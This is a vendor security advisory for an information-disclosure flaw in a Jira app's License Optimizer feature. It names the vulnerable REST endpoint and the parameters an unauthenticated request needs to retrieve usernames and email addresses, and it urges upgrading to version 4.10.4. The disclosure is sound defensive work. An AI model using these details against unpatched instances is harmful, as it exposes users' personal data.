Advisory Release Date



License & User Deactivator for Jira

Affected License & User Deactivator for Jira versions

4.8.1 - 4.10.2

Fixed License & User Deactivator for Jira versions

4.10.4 and upcoming versions

CVSS Score: Base Score / Temporal Score5.3


This advisory discloses a medium severity security vulnerability affecting License & User Deactivator for Jira when using License Optimizer for Jira Service Management since version 4.8.1.


If you are using the License Optimizer functionality for Jira Service Management and need to assign a user that has currently no access, License Optimizer overrides the Jira /rest/api/latest/user/assignable/search response.

A missing authentication and authorization check enabled users not logged in or not having access to the specific JSM project in the REST request to retrieve users that can be assigned to an issue.

That JSON response contains usernames and email addresses, among a few other user properties:

      "displayName":"Service Desk Agent",


To retrieve a response like this as an unauthenticated user you still have to provide all the following parameters in the REST request:

  • a valid project key of a JSM project
  • a valid key of an issue in that project
  • a non-empty search term for the username parameter in the request that matches users who have the Service Desk Team project role

What You Need to Do

Please update the app to version 4.10.4 or future, later versions.


If you have questions or concerns regarding this advisory, please raise a support request via our Support Portal.